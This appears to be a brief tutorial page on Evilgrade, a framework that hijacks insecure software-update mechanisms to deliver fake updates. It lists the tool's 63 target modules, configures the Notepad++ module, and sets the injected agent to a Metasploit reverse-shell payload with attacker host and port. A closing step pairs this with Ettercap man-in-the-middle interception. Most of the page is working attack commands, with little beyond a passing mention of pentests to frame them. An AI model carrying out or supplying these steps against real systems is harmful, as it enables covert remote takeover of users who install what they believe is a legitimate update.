EvilGrade

Description

Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents), a working default configuration for fast pentests, and has it’s own WebServer and DNSServer modules. Easy to set up new settings, and has an auto configuration when new binary agents are set. It is a part of cyborg linux spoofing toolkit

Example

List Available Modules :

            _ _                     _      
           (_) |                   | |     
  _____   ___| | __ _ _ __ __ _  __| | ___ 
 / _ \ \ / / | |/ _` | '__/ _` |/ _` |/ _ \ 
|  __/\ V /| | | (_| | | | (_| | (_| |  __/ 
 \___| \_/ |_|_|\__, |_|  \__,_|\__,_|\___| 
                __/ |                      
                |___/ 
-------------------------------------------
---------------------  www.infobytesec.com 
- 63 modules available.

evilgrade>show modules

List of modules:
===============

allmynotes
amsn
appleupdate
apptapp
apt
atube
autoit3
bbappworld
blackberry
bsplayer
ccleaner
clamwin
cpan
cygwin
dap
divxsuite
express_talk
fcleaner
filezilla
flashget
flip4mac
freerip
getjar
gom
googleanalytics
growl
isopen
istat
itunes
jet
jetphoto
linkedin
miranda
mirc
nokia
nokiasoftware
notepadplus
openoffice
opera
orbit
osx
paintnet
panda_antirootkit
photoscape
quicktime
skype
sparkle
speedbit
sunbelt
sunjava
superantispyware
teamviewer
techtracker
trillian
ubertwitter
vidbox
virtualbox
vmware
winamp
winscp
winupdate
winzip
yahoomsn
- 63 modules available.

Use Any one Module in this case notepadplus:

e v i l g r a d e>configure notepadplus
e v i l g r a d e(notepadplus)>show options

Display options:
===============

Name = notepadplus
Version = 1.0
Author = ["Francisco Amato < famato +[AT]+ infobytesec.com>"]
Description = "The notepad++ use GUP generic update process so it''s boggy too."
VirtualHost = "notepad-plus.sourceforge.net"

.----------------------------------------------.
| Name   | Default           | Description     |
+--------+-------------------+-----------------+
| enable |                 1 | Status          |
| agent  | ./agent/agent.exe | Agent to inject |
'--------+-------------------+-----------------'

evilgrade(notepadplus)>

 

Set MSF for reverse connection when someone try to update notepadplus :

evilgrade(notepadplus)>set agent ’["/opt/metasploit/apps/pro/msf3/msfpayload windows/shell_reverse_tcp LHOST=192.168.1.6 LPORT=1234 X > <%OUT%>/tmp/notepadplus.exe<%OUT%>"]’

Start EvilGrade server :

evilgrade(notepadplus)>start

Now use Ettercap for MITM and Sniffing .

0 Comments

Leave a reply

CONTACT US

We're are building as a community and a team. Be a part of it.

Sending

©2017 Ztrela Knowledge Solutions Pvt. Ltd

Log in with your credentials

Forgot your details?